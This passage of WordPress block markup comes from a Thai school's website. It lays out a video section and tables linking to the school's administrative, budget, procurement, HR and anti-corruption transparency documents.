{\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtu.be/C9do6YkaRVU?si=6QeXpJR-PUh7xatA\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/LVfYUq7zwYQ?si=PRL0_feQTmuxz4ZK\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/LVfYUq7zwYQ?si=PRL0_feQTmuxz4ZK\n</div></figure>\n<!-- /wp:embed --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a 